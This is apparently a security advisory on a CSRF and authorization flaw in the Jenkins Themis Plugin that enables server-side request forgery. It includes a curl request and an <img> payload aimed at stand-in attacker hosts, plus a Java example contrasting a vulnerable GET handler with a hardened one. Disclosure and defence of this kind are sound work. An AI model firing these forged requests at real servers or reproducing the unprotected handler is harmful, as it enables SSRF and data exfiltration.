The CVE in the Jenkins Themis Plugin stems from a missing permission check and missing CSRF protection on one of the plugin's HTTP endpoints. Versions 1.4.1 and earlier do not verify that the requesting user holds any permission beyond Overall/Read before handling requests to this endpoint. An attacker can therefore craft a web page that, when visited by an authenticated Jenkins user, causes the victim's browser to send a forged request to the vulnerable endpoint. Because the endpoint neither requires a POST request nor validates a CSRF token, that request is processed with the victim's privileges and makes the Jenkins instance open a connection to an attacker-controlled server. The chain combines insufficient authorization with a missing CSRF defence, enabling server-side request forgery (SSRF) and data exfiltration.
Platform: Jenkins Plugin
Version: 1.4.1 and earlier
Vulnerability: CSRF & Authorization
Severity: Moderate
Date: 2025-10-29
Prediction: 2025-11-12
What Undercode Says:
`curl -X GET 'http://jenkins-host/jenkins/plugin/themis/endpoint?url=http://attacker-server'`
`// Missing permission check in handler: Overall/Read is the only check performed`
`if (user.hasPermission(Overall.READ)) { connectToURL(request.getParameter("url")); }`
How it is exploited:
A malicious page embeds `<img src="https://jenkins/plugin/themis/endpoint?url=http://attacker/exfil">`; the victim's browser issues that GET request with the victim's Jenkins session, and the server-side handler connects to the attacker's host.
Protection from this CVE:
Apply the plugin update. Use security plugins. Require POST requests (so that Jenkins' CSRF crumb check applies) and enforce a stronger permission check than Overall/Read on the endpoint.
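As an added illustration, not the Themis Plugin's own source (which this post does not show), here is the vulnerable handler pattern described above beside a hardened version that uses Jenkins' standard controls; the package, class and method names are hypothetical, and only the `url` query parameter is taken from the post.

```java
package io.example.themis; // hypothetical package, not the real plugin's

import hudson.Extension;
import hudson.util.FormValidation;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;

@Extension
public class ThemisExampleConfiguration extends GlobalConfiguration {

    // BEFORE (the pattern the advisory describes): any Overall/Read user can
    // reach this via a plain GET, so a cross-site <img> tag is enough to make
    // Jenkins open an outbound connection to a URL the attacker chose.
    public FormValidation doTestConnection(@QueryParameter String url) throws IOException {
        connect(url);
        return FormValidation.ok();
    }

    // AFTER: @RequirePOST makes Stapler reject GET, and POST requests pass through
    // Jenkins' crumb (CSRF token) filter; checkPermission throws AccessDeniedException
    // for callers without Overall/Administer before any connection is attempted.
    @RequirePOST
    public FormValidation doTestConnectionFixed(@QueryParameter String url) {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        try {
            connect(url);
            return FormValidation.ok("Connection succeeded");
        } catch (IOException e) {
            return FormValidation.error(e, "Connection failed: " + e.getMessage());
        }
    }

    // Shared outbound check. Short timeouts bound how long a request to an
    // unreachable host can tie up a Jenkins request-handling thread.
    private static void connect(String url) throws IOException {
        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
        conn.setConnectTimeout(3000);
        conn.setReadTimeout(3000);
        conn.setRequestMethod("HEAD");
        if (conn.getResponseCode() >= 400) {
            throw new IOException("HTTP " + conn.getResponseCode());
        }
    }
}
```

The fixed method rejects the forged GET outright and, even for a POST that carries a valid crumb, refuses to connect unless the caller holds Overall/Administer.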
Impact:
Server-Side Request Forgery. Data exfiltration. Unauthorized connections.
Sources:
Reported By: github.com